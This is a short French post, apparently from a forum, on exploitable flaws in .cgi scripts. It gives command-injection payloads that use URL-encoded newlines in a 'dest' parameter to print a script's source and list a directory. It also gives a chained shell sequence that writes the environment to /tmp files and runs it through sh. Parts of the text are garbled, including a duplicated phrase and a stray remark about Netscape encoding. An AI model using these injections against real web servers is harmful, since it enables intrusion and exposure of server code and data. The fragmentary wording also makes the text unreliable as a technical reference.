J'ignore la raison de développer des scripts .cgi mais voici les potentielles failles exploitable :
%0A ou %0A sont des retour ou fin de ligne ?dest%0Acat<index.cgi = va afficher le contenu du script ?dest%0Afind<. = va permettre de lister le contenu du dossier
C'est mal supporté par Netscape ANSI Encoded
Il est possible d’interagir avec le serveur en plusieurs étapes:
env > /tmp/a cat </tmp/a > /tmp/b sh </tmp/b > /tmp/c cat </tmp/c